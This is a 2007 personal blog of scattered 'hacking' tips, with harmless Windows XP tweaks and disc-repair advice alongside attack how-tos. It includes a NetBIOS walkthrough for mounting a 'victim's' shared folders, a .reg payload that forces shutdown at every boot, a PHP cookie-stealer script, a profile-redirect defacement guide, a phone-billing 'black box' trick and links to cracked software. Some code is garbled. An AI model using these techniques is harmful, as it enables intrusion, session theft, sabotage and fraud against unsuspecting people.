Friday, December 14, 2007

repairing scracthed disk........

How to repair scratched discs?

You no need to buy expensive liquid or foam to repair scratched discs. All you need is just toothpaste.

Yes, I said toothpaste. With the toothpaste, you can fix the scratches on the discs and get the shiny back

Here how you can do it by yourself to repair the scratched discs.

Put toothpaste on the disc surface. Apply the toothpaste all over the scratches. Rinse with water. Dry it with clean cloth. Done!

or by applying oil.......................


note :- worst scracthed disk may not work .........

Dedicated to hacking ( a- z hacking stuff here)

Dedicated to hacking ( a- z hacking stuff here)


hi friends i have posted all the hacking related stuffs & other links here ............related only to hacking , cracking , scripting, virus , etc.......my motive is to make all stuff availible for u at only one place which will be convinient 4 u 2 use and read...........you don't have 2 search here & there on different communities, or any other website.............i have posted different links and articles related to hacking here together at one place....................

for seeing this article............

http://www.orkut.com/CommMsgs.aspx?cmm=38348851&tid=2562210537026442273


u will have to log in ur orkut account.....................

hacking.....................solitare game.........

just try it .i ts quite new .

every one wants to win everygame

this is the method troughwhich u can win every time .

this is all about solitare . wnever u play it

just press . " shift + alt + 2 "

press 2 ( @ ) , don't press 2 from the num pad )

and tn see the miracle .

Hacking In 15 Seconds!

Hacking In 15 Seconds!

system intrusion in 15 sec............

this how hackers attack the box ..........................

if your victim possess certain security flaws then her system can be broken into in less that 15 seconds.

This is how : -

Click "Start -> Run -> cmd"

Type the following at the Dos Prompt

Nbtstat –A IP address [e.g: nbtstat –A 207.175.1.1]

This will give you a read out that looks like this

NetBIOS Remote Machine Name Table
______________________________
Name Type Status
______________________________

abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered ____________________________________

The numbers in the <> are hex code values. What we are interested in is the “Hex Code” number of <20>. A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -
Net view \\
[e.g : net view \\207.175.1.1]

You will then get a response that looks something like this. Shared resources at \\ip_address Sharename Type Comment

______________________
MY DOCUMENTS Disk
TEMP Disk
_______________________

The command was completed successfully.)


This shows you that your potential victim has their My Documents Folder shared and their Temp directory shared. For you to then get access to those folders next command will be.

Net use x: \\\temp
[e.g : net use x: \\207.175.1.1\temp]

If all goes well for you, you will then get a response of
(The command was completed successfully.)
Open my computer you will see your victim's temp folder there.

10 FANTASTIC YouTube, Yahoo, Google Video Download

10 FANTASTIC YouTube Video Download Tools10 FANTASTIC YouTube, Yahoo, Google Video Downloading Tools.All tested. All working.1.)

Download videos from Yahoo, Youtube,

Google:http://zenisa.com/2007/08/02/download-vdeos-youtube-google-vdeos/

2.) YouTube (IN MPEG) Video Downloaderhttp://zenisa.com/2007/08/01/youtube-in-mpeg-video-downloader/

3.) YouTube (IN MPEG) Video Downloader
http://zenisa.com/2007/08/01/youtube-in-mpeg-video-downloader/

4.) Youtube Grabber - Alternate Link
http://zenisa.com/2007/08/01/youtube-grabber-alternate-link/

5.) YouTube : Download Videos to your DVD
http://zenisa.com/2007/08/01/youtube-download-play-pack/

6.) YouTube to DVD

http://zenisa.com/2007/08/01/hacking-tool-youtube-to-dvd/

7.) 1-2-3 steps to YouTube Download & Play Pack

http://zenisa.com/2007/08/01/1-2-3-steps-to-youtube-download-play-pack/

8.) How to download/capture videos at www.youtube.com

http://zenisa.com/2007/08/01/how-to-downloadcapture-videos-at-wwwyoutubecom/

9.) How to download/capture videos at
www.youtube.comhttp://zenisa.com/2007/08/01/how-to-downloadcapture-videos-at-wwwyoutubecom/

10.) Real Player 11 full (+YOUTUBE DOWNLOADER)

http://zenisa.com/2007/07/30/eal-player-11-full-youtube-downloader/

hide ur folders in adifferent way$$$$$$$$$$$$$$$

hide ur folders in adifferent way

Right Click on the desktop.Make a new folder

2)Now rename the folder with a space(U have to hold ALT key and type 0160).

3)Now u have a folder with out a name.

4)Right click on the folder>properties>customize. Click on change icon.

5)Scroll a bit, u should find some empty spaces, Click on any one of them.
click ok
Thats it, now u can store ur personal data without any 3rd party tools.


-------------------------------------------------------------------------------------------

U can also hide ur folder by dis method:-

open Start>Run>CMD
now type attrib +s +h C:/name of d folder u want to hide
Now even in the folder option Show all Hide folders is slected still u will get dis folder hide...

And to unhide type same command juzz put "-" instead of "+"

Shutdown ur friend's comp when everytime it starts

Shutdown ur friend's comp when everytime it starts

put this followin text in a .reg file and run it in the victims pc:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"


------------------------------

DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.



You can also put this in a javascript code, just add this code to your webpage:

Cookie Stealing

Cookie Stealing

What is it?

A cookiestealer is a small script, written in a webbased programming language (in this case PHP). It reads a variable from the address-bar, which contains in our case the cookies, which we want to steal. Ofcourse you can add some more information, like the referrer, the IP and the date and time of the log.

Why to use it?

As you might know, most of the time, login-information is stored in cookies.So if you can make the browser think you're the one who logged in, and setthe cookies, you'll be able to login as the person you defaced. How we makethe browser think this, I will learn you later on.

Writing the stealer.

will give you the script and after that I will explain what it does line by line. So here it is:

1 2 $cookie = $_GET['c];
3 $ip = getenv ('REMOTE_ADDR');
4 $date=date("j F, Y, g:i a");;
5 $referer=getenv ('HTTP_REFERER');
6 $fp = fopen('cookies.txt', 'a');
7 fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


');
8 fclose($fp);
9 header ("Location: /picture.html");
10 ?>

That's all! Well, time to explain:
1: 2: $cookie = $_GET['C']; Here the variable $cookie gets the content out ofthe adress, from what's behind C=[the cookie]
3: $ip = getenv ('REMOTE_ADDR'); That's the IP of the person which is redirected to our stealer.
4. $date=date("j F, Y, g:i a");; This sets the variable $date the current time and date, IMPORTANT: this is done in dutch way, so year - month - day!
5. $referer=getenv ('HTTP_REFERER'); That must be the referer, don't youthink =p
6. $fp = fopen('cookies.txt', 'a'); This specifies the file which has to be rewritten with the cookie, and 'a' stands for the way of writing, in this case adding the new content to the end of the file.
7. fwrite($fp, 'Cookie: '.$cookie.'\n IP: ' .$ip. '\n Date and Time: ' .$date. '\nReferer: '.$referer.'\n\n\n'); This line writes the content to the file.
8. fclose($fp); Close the file (dûh)
9. header ("Location: /picture.html"); send the visitor to another page, so hewont notice that the cookie is logged... ofcourse picture.html can be everything.
10. ?> The closing tag for a php-script
Now we have to know how to make the link:This must be the most basic version:

want to learn hacking.........?

starting hacking ? abcd of hacking................

to start hacking u must know first :-

01) your hardware ( includes everything , assembling pc , knowing motherboard each & every part , basics abt lan , router,modem & their working , etc.......then explore your pc by inside :-

02) ie. knowing different types of software ( every category like SECURITY SOFTWARE , DEVELOPER TOOLS ( like adobe dreamweaver ,site spinner ,cofeecup html editor etc) , Utilities & Drivers ( like system mechanic , registory editor ) , Networking Software ( ping tracer , scanner etc) , Chat, VoIP & E-mail Software e.t.c

03) if using win xp operating sys. then first of fall learn,understand xp , explore secret tips , and many more u can get everything about xp here:-

http://freepctech.com/pc/xp/xpindex.shtml
http://xp.codeitbetter.com/
http://windowxpforu.blogspot.com/search/label/Tips%20Tricks%20Secrets%20of%20XP
http://www.hsinlin.com/tips/winxptop.html
http://www.metacafe.com/watch/754299/windows_xp_secret_tricks/
http://www.hiddentricks.com/windows-tricks.html

04) Learn DOS prompt ( each and every command for a perfect hacker ) { v.imp step to start hacking} Learn how to make a few batch files. here u can get list of dos commands :-

http://www.computerhope.com/msdos.htm
http://rahulhackingarticles.wetpaint.com/page/All+Dos+Commands?t=anon
http://www.easydos.com/dosindex.html
http://www.uv.tietgen.dk/staff/mlha/PC/Soft/DOS/com/

05) read article on hacking , pc magazines , reading public forums on hacking , reading e-books on hacking , using google to hack ...........................

06) must have some knowledge about HTML ,C++, visual basic .... (i'd recommend learning html as your first language )

07) understanding networking & security tools ..............

08) knowing different tools of hacking & how to use them..............few tools like :-
Key Loggers
port scanner
ip scanner
fake id creator
network tracer
RAT (Remote Administration Tool) of 2003 {Global Killer 1.0
Artic 0.6b
Beast 2.00
Kikbak 0.9 }
Spywares
Trojans { Adult_Chat dialer Express
FactoryNetwork Dialer }

and many more :- u can get a list from here :-

http://www.thenetworkadministrator.com/2003MostPopularHackingTools.htm
http://www.darknet.org.uk/2006/04/top-15-securityhacking-tools-utilities/
http://sectools.org/

09) KNOW FTP , TCP/Ip , UDP , DHCP , also know how to use unix operating sys..........

10) understanding diassembler language ....... ( or wat is called now as "REVERSE ENGINEERING" )http://www4.in.tum.de/lehre/seminare/hs/WS0506/mvs/files/Vortrag_Golesteanu.pdf

http://www.jenkins-ip.com/serv/serv_6.htm

http://www.reverse-engineering.net/

11) LAST BUT NOT THE LEAST " PRACTISE YOUR TASK EACK AND EVERY DAY " AS SLOW & STEADY ALWAYS WINS THE RACE.....................AFTER DOING ALL THESE U R A HACKER NOW... CONGRATES...........HAPPY HACKING......................FRIENDS..........

-------------------------------------------------------------

few unknown hacking site
http://72.14.235.104/search?q=cache:mBPybjpBOGIJ:hackersinternational.com/access/content/Hacking_Secrets_Revealed.pdf+hacking+secrets+revealed&hl=en&ct=clnk&cd=1http://ihacked.50webs.com

http://noballs.org/ebooks/

http://www.catb.org/~esr/faqs/hacker-howto.html
http://www.hackthissite.org/ http://www.phrack.org/issues.html?issue=1 http://www.totse.com/en/hack/introduction_to_hacking/hack101.html

http://www.iwar.org.uk/hackers/resources/harmless-hacking/gtmbeg1.html

http://www.hackersinternational.com/access/home_access.html

http://www.hackthissite.org/pages/info/programs.php

http://www.hackthissite.org/articles/ ftp://ftp.freenet.de/pub/filepilot/windows/

http://serialturk.blogcu.com/3695641/

http://www.hackaday.com/category/cellphones-hacks/

-------

1000000+ free appz s/w cracks....

1000+ WINDOWS APPLICATIONS

1000+ WINDOWS APPLICATIONSTHIS FTP SERVER HAVE

1000+ IMPORTANT WINDOWS APPLICATIONS WITH CRACK.

NOW THATS WHAT I CALL A HUGEEEEEEEEEEE COLLECTION OF APPZ..

ftp://ftp.freenet.de/pub/filepilot/windows/

ftp://194.44.214.3/pub/
ftp://ftp.uglan.ck.ua/games2/
ftp://24.205.131.21/
ftp://217.172.16.3:8778/
ftp://194.187.207.98/

how to deface a friendster account profile

how to deface a friendster account profile

i just wanna give you an easy tutorial how to deface a friendster profile or we can call it how to redirect the main page (profile) to other link. over here we just need

three simple steep to do it: -

-==1==-- login to your own friendster account -

-==2==-- find your victim account -

-==3==-- begin to write a testimonial-----------------------------------------------------------

hai how are you? you are so sexy, but why your eyes like my cat's pussy? and everything what do you want to write

ending manner------------------------------------------------------------------------------------------
copy and paste the source above exactly after you put the link where you want to put the the main profile page. and wait until your sexy victim login to their own account and when the victim going to the pending testimonial area to check the testimonial directly their page will redirect to the link that you put it before. usually this exercise just work by internet explorer (the victim will redirect when they login to their account by using internet explorer)but you can try it by any browser mozilla, opera, netscape, or i.e. i am sorry if i have any mistake by this simple tutorial because i just wanna share my experience and my knowledge.thanks and happy fun

20 hidden things for pc u should know..........

20 hidden things.........plz read this v-imp

1. It boasts how long it can stay up. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can make it show everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be the software and you can now uninstall it.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options.

6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry.

7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can change things back by typing 'regsvr32 zipfldr.dll'.

9. XP has ClearType -- Mic*ft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your friend's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might go insane before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Mic*ft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

20. Windows XP secretly KNOWS that the average user has no idea what they are doing. Therefore, it doesn't let you do really stupid things like deleting the windows directory (at least not without spending several hours convincing it that you REALLY want to do this). Oh yeah, and internet explorer kinda sucks.

some World wide Web (WWW) sites of interest to hackers

some World wide Web (WWW) sites of interest to hackers

http://crimelab.com//bugtraq/bugtraq/html
http://cs.purdue.edu/homes/spaf/coast.html
http://cs.purdue.edu/homes/spaf/pcert.html
http://first.orghttp://l0pht.com
http://tamsun.tamu.edu/~clm3840/hacking.html/
http://www.net23.com
http://www.tnt.uni-hannover.de/stud/hamid.html
http://www.spy.org /Security/Local/News
http://www.phantom.com/~king

some ftp sites of interest to hackers

some ftp sites of interest to hackers:----------

ftp://ftp.aql.gatech.edu/
ftp://ftp.bellcore.com/
ftp://ftp.cert.org/
ftp://ftp.cipher.com/
ftp://ftp.deimos.cs.uah.edu/
ftp://ftp.csua.berkeley.edu/ /pub/cypherpunks
ftp://ftp.eff.org/ /pub/cud
ftp://ftp.etext.org/ftp://ftp.netcom.com/ /pub/bradleym
ftp://ftp.netsys.com/
ftp://ftp.win.tue.nl/
ftp.garbo.uwasa.fi:pc/crypt
ftp.ghost.dsi.unimi.it:/pub/crypt
ftp://ftp.hackthis.pc.cc.cmu.edu/
ftp://ftp.halcyon.com/
ftp://ftp.info.cert.org/
ftp.ripem.msu.edu:pub/cryptftp://ftp.rtfm.mit.edu/
ftp://ftp.spy.org/ftp://ftp.theta.iis.u-tokyo.ac.jp/ /pub1/security

What is a Black Box?

What is a Black Box?

A Black Box is a 10k ohm resistor placed across your phone line tocause the phone company equipment to be unable to detect that you haveanswered your telephone. People who call you will then not be billedfor the telephone call.

Find out Email sent by you is read or not

Find out Email sent by you is read or not

Now you can find out when your email has been read by the recipient! No more guessing: "Has he or she read my email yet?"SpyPig is a simple email tracking system that sends you a notification email as soon as the recipient opens and reads your message.It works with virtually all modern email programmes: Outlook, Eudora, Yahoo Email , Gmail, Hotmail, AOL Email and many others.Best of all, SpyPig is FREE! No spam, no virus, no adware? You can use it as often as you like, and there's no catch.The system is very easy to use. In just few minutes, you'll be able to use it like a real spy!To start using SpyPig, follow the simple steps in the SpyPig Farm .

Enable right click on websites

Enable right click on websites

Lots websites have disabled the right click function of mouse button..... it's really annoying.This is done so that you don't able to copy the(via right-click:>>save picture) thier photos or images or any goodies.Unfortunately it disables all right click funtionality .You can enable it by clicking:Tools>>internet option >>security tab>>custom levelscroll down to scripting section, set active scriting to disableClick ok a couple of times .You'll probably want to turn this back to "enable" when your done

Bypassing Word Verification for links

Bypassing Word Verification

# You may get irritated while sending a link in your friends scrapbook.
# You can bypass this word verification while sending links by this trick.
# The simple logic is you make the link 'dead'.
# All you have to do is to just change http to hTTp (two capital T's) and www to wWw.# Now the link will be dead and bypass the word verification............